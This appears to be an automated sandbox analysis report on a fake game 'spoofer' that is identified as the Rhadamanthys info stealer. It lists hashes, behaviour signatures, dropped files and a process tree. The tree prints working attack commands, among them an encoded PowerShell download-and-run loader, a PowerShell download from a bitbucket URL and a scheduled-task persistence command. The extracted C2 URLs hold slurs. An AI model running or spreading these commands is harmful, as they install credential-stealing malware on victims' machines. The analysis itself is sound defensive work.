Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
09-06-2024 19:56
General
-
Target
Moon Spoofer/Moon Spoofer/Spoofer.exe
-
Size
7KB
-
MD5
960d70161f0ac1ddd8093955446bdcbc
-
SHA1
5943c81939f9b43228e2fe2f65e90c54660ae47f
-
SHA256
31e6573e37d06a71b3025c0e9ed4901093ed5262bc60bbbdf7ce1ed28ebb021a
-
SHA512
8f3f6091fb3d09d4cdb0f9540bbbc2de0562dd5bb77c8446db49f274be7b173cbc0aa24206e25838cc6b6c6578440c0ecfd1a17acc94c50ebd014cbe16617c14
-
SSDEEP
192:+9yqvjp73xsznGjcJr9emxan6mUqlwc6nYZKvkV/9dXq:+9Jv1dOnGjcJrQmxan6m/ec6nYZSkV/2
Malware Config
Extracted
https://rentry.org/FUCKOFFNIGGA/raw
Extracted
https://bitbucket.org/gedegrereghh/fuckyougithub/raw/37140025d15f5d49ec2bd023f7557f06268d7c49/pancake-unpacked.rar
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates processes with tasklist 1 TTPs 8 IoCs
-
Kills process with taskkill 8 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 19 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Moon Spoofer\Moon Spoofer\Spoofer.exe"C:\Users\Admin\AppData\Local\Temp\Moon Spoofer\Moon Spoofer\Spoofer.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAdABoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBtAG4AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBuAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABlAG0AIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAEYAVQBDAEsATwBGAEYATgBJAEcARwBBAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBkAHYAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG4AagBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAeQB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB6AHUAagAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBmAHcAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAagBtAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHkAYwBoACMAPgA="2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\tco23iyp.2sp0.exe"C:\Users\Admin\AppData\Roaming\tco23iyp.2sp0.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4035.tmp\4036.tmp\4037.bat C:\Users\Admin\AppData\Roaming\tco23iyp.2sp0.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 12515⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"5⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"5⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "MyBatchScript"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f5⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/gedegrereghh/fuckyougithub/raw/37140025d15f5d49ec2bd023f7557f06268d7c49/pancake-unpacked.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "tf_win64.exe"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im tf_win64.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "dota2.exe"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im dota2.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "cs2.exe"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cs2.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "RustClient.exe"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im RustClient.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "GTA5.exe"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im GTA5.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "TslGame.exe"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im TslGame.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "RainbowSix.exe"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im RainbowSix.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "steam.exe"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im steam.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\tar.exetar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\Admin\Desktop\Steam.lnk'); $s.TargetPath = '\steam.exe'; $s.Save()"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\tco23iyp.2sp1.exe"C:\Users\Admin\AppData\Roaming\tco23iyp.2sp1.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD571444def27770d9071039d005d0323b7
SHA1cef8654e95495786ac9347494f4417819373427e
SHA2568438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD50f6a3762a04bbb03336fb66a040afb97
SHA10a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA25636e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69
-
C:\Users\Admin\AppData\Local\Temp\4035.tmp\4036.tmp\4037.batFilesize
6KB
MD55356df66c550e8bf737e23956f5a8406
SHA18f40c948922bcc96ee5bb79ad6ed71ac0369c7f9
SHA2563b03eba10dc8cc18f1ffa3726d6ff3e242183da10b47c8217f0b3b79eee1b3c8
SHA512abef71ab94f3821f5430d1f65902fc06b2bd73b6c2014d8c9fc5718e9241db5534f033a414d328d1f135d454f46d44986bc5cab52f2d8c828557d92e3976e7f4
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pli5ayhi.juk.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\tco23iyp.2sp0.exeFilesize
126KB
MD52f6b6a51b8426be18badffd9294b0d9f
SHA12d4aaeffe325c93e61c38349d5a41fdb1b58c24f
SHA25636d868815764b2c7b77ded962a02c2949db328a98ac714644e9426bb6d47fa1a
SHA5123628f903a02fd27b049addfba2f936aee4d039f2c201438fd12d8bca58ab2dee852d3cfd54cd78fe9ec0b2ea86eb85c980dcea271e76e26a7588a4e8fc614d6c
-
C:\Users\Admin\AppData\Roaming\tco23iyp.2sp1.exeFilesize
355KB
MD501a72f1659cfe71d56340773f3c89bf9
SHA1b87d0a06df5896b9129efd823ea237905cfa9d1e
SHA2567205faf5054589ce7dc6b68dcfea45c18859cb49a3c0d4bda840fc9d308152bd
SHA51259e1de953a7bbb7f87da2de9c9575ba7c0098b31afc549c1eff2256ee9beddc590aec88d32716f386fd3a7037d610365d72bbded94278cd0d341ce337579d1e8
-
memory/552-60-0x0000000000B70000-0x0000000000B79000-memory.dmpFilesize
36KB
-
memory/552-64-0x00007FFDEFAF0000-0x00007FFDEFCE5000-memory.dmpFilesize
2.0MB
-
memory/552-66-0x00000000757D0000-0x00000000759E5000-memory.dmpFilesize
2.1MB
-
memory/552-63-0x0000000002910000-0x0000000002D10000-memory.dmpFilesize
4.0MB
-
memory/1288-14-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmpFilesize
10.8MB
-
memory/1288-15-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmpFilesize
10.8MB
-
memory/1288-41-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmpFilesize
10.8MB
-
memory/1288-8-0x000002A32F660000-0x000002A32F682000-memory.dmpFilesize
136KB
-
memory/1288-17-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmpFilesize
10.8MB
-
memory/1288-13-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmpFilesize
10.8MB
-
memory/1288-16-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmpFilesize
10.8MB
-
memory/2768-1-0x00007FFDD1A43000-0x00007FFDD1A45000-memory.dmpFilesize
8KB
-
memory/2768-0-0x0000000000B80000-0x0000000000B88000-memory.dmpFilesize
32KB
-
memory/3172-61-0x0000000000E80000-0x0000000000EED000-memory.dmpFilesize
436KB
-
memory/3172-56-0x0000000004120000-0x0000000004520000-memory.dmpFilesize
4.0MB
-
memory/3172-40-0x0000000000E80000-0x0000000000EED000-memory.dmpFilesize
436KB
-
memory/3172-55-0x0000000004120000-0x0000000004520000-memory.dmpFilesize
4.0MB
-
memory/3172-59-0x00000000757D0000-0x00000000759E5000-memory.dmpFilesize
2.1MB
-
memory/3172-57-0x00007FFDEFAF0000-0x00007FFDEFCE5000-memory.dmpFilesize
2.0MB